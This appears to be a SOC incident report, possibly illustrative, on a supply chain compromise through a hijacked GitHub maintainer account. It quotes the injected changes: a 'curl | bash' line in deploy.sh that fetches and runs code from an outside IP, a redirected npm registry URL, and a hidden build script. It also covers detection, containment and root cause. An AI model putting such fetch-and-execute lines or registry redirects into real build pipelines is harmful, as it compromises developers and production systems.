T1195 – Supply Chain Compromise (GitHub Detection)

by

GitHub Alert Details

Alert ID: GITHUB-SUPPLY-CHAIN-7842
Alert Time: 2024-02-12 10:45:22 EST
Severity: CRITICAL (95/100)
Source: GitHub Advanced Security
Rule: “Compromised Maintainer Account – Malicious Commit”
MITRE ATT&CK: T1195 – Supply Chain Compromise

Alert Details:

Repository: company/internal-toolkit (Private)

Action: Malicious commit detected

Commit Details:

– Commit Hash: 8f7e6d5c4b3a2a1b9c8d7e6f5a4b3c2d1e0f9a8b

– Author: “jsmith” (John Smith – Legitimate maintainer)

– Time: 2024-02-12 10:30 EST

– Branch: main

– Files Modified: package-lock.json, build.js, deploy.sh

Suspicious Changes:

1. package-lock.json:

   – Added dependency: “lodash@4.17.21” → “lodash@4.17.21”

   – BUT: Package registry URL changed to: http://185.143.221[.]89/npm/

   – Dependency fetch now points to attacker-controlled registry

2. build.js:

   – Added: require(‘./node_modules/.hidden/post-build.js’)

   – Hidden file downloads additional payload during build

3. deploy.sh:

   – Added: curl -s http://194.165.16[.]89/update | bash

   – Executes during deployment pipeline

Additional Context:

– Commit made from IP 45.134.225[.]78 (Netherlands)

– Legitimate maintainer jsmith is currently on vacation

– No other commits from this IP in history

– GitHub account may be compromised

SOC Investigation Process

StepActionTools UsedFindings
1. Alert ValidationVerify GitHub Advanced Security alertGitHub Security TabConfirmed malicious commit from maintainer account
2. Account VerificationContact maintainerPhone, Teamsjsmith confirmed on vacation; did not make commit
3. Immediate ActionRevert malicious commitGitHub, Git RevertCommit reverted; branch protected
4. Account RemediationSecure compromised accountGitHub, OktaPassword reset; MFA enforced; sessions revoked
5. Build Pipeline CheckVerify no compromised buildsJenkins, CI/CD LogsNo builds ran between commit and revert
6. Dependency AuditCheck for compromised dependenciesSnyk, DependabotNo malicious packages downloaded
7. IOC DistributionBlock malicious infrastructurePalo Alto, Cisco UmbrellaIPs/URLs added to blocklists

Jira Incident Report

Ticket: SOC-2024-063
Summary: T1195 – Supply Chain Compromise via Compromised GitHub Maintainer
Status: RESOLVED
Resolution: MALICIOUS – Commit Reverted
Priority: P1 – CRITICAL
Labels: T1195, supply-chain, github, compromised-account, code-injection, devsecops
Components: Software-Supply-Chain, Identity-Management

INCIDENT ANALYSIS REPORT

1. Initial Context:

  • Detection Source: GitHub Advanced Security.
  • Alert: “Compromised Maintainer Account – Malicious Commit”.
  • Repository: company/internal-toolkit (private).
  • Maintainer: jsmith (John Smith).
  • Time: 2024-02-12 10:45 EST.
  • Technique: MITRE ATT&CK T1195 – Supply Chain Compromise.

2. Technical Analysis:

  • Compromise Details:
  • Attack Vector: GitHub account jsmith compromised via credential stuffing (password reused from personal breach).
  • Attacker IP: 45.134.225[.]78 (Netherlands)
  • Commit Time: 2024-02-12 10:30 EST
  • Dwell Time: 15 minutes until detection
  • Malicious Changes:

1. package-lock.json – Registry Hijacking:

  • Changed npm registry URL to attacker-controlled server
  • Any future npm install would fetch malicious packages
  • Affects all developers and CI/CD builds

2. build.js – Hidden Backdoor:

  • Added reference to .hidden/post-build.js
  • File not in commit; would be downloaded during build
  • Post-build script would execute with build privileges

3. deploy.sh – Remote Execution:

  • Added curl command to download and execute script
  • Would run during deployment to production
  • Provides persistent access
  • Attacker Capabilities Gained:
  • Access to internal toolkit repository
  • Ability to inject code into build/deploy pipeline
  • Potential to compromise all developers (via npm)
  • Potential to compromise production (via deploy.sh)

3. Investigation Findings:

  • Timeline:

10:30 – Malicious commit made from Netherlands IP

10:32 – GitHub Advanced Security detects anomaly

10:45 – SOC alert generated

10:47 – Investigation begins

10:48 – jsmith contacted (on vacation)

10:50 – Commit reverted

10:52 – jsmith account secured

10:55 – CI/CD pipelines verified (no builds)

  • Account Compromise Analysis:
  • jsmith used same password on personal GitHub (breached)
  • No MFA on GitHub account (now enforced)
  • No 2FA on personal email (attack vector)
  • Impact Assessment:
  • No builds ran during 22-minute window
  • No developers ran npm install after malicious commit
  • No production deployments affected
  • Repository history cleaned

4. Containment Actions:

  • Immediate Actions (10:47-10:55 EST):
  • Reverted malicious commit.
  • Protected main branch (require PR + approval).
  • Reset jsmith’s GitHub password.
  • Enforced MFA on GitHub account.
  • Revoked all active sessions.
  • Pipeline Verification:
  • Checked Jenkins build logs (no builds during window).
  • Verified npm cache (no external downloads).
  • Audited dependency tree (clean).
  • Infrastructure Blocking:
  • Added IPs 45.134.225[.]78, 185.143.221[.]89, 194.165.16[.]89 to blocklists.
  • Added malicious domains to DNS filter.

5. Root Cause Analysis:

  • Primary Cause: Compromised GitHub maintainer account via credential reuse.
  • Contributing Factors:
  1. No MFA on GitHub account.
  2. Password reused from personal breach.
  3. No branch protection requiring PRs.
  4. No code review for direct commits.

6. Business Impact:

  • Operational Impact: None (caught before impact).
  • Supply Chain Risk: HIGH – Potential to compromise all developers.
  • Data Exposure: None.

7. Remediation & Prevention:

Completed Actions:

  • checkedMalicious commit reverted.
  • checkedAccount secured with MFA.
  • checkedBranch protection enabled.
  • checkedIOCs blocked.

Technical Controls Enhanced:

  • checkedEnforced MFA for all GitHub accounts.
  • checkedEnabled GitHub Advanced Security for all repos.
  • checkedImplemented branch protection rules (require PR, approvals).
  • checkedDeployed dependency scanning (Snyk, Dependabot).
  • checkedCreated incident response playbook for supply chain attacks.

8. Conclusion:

This incident involved a sophisticated supply chain attack via a compromised GitHub maintainer account. The attacker injected malicious code that would have compromised the build and deployment pipeline. Rapid detection and response prevented any impact.

Closure Rationale: Malicious commit reverted; account secured; enhanced controls implemented.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-12 12:00 EST

Leave a Comment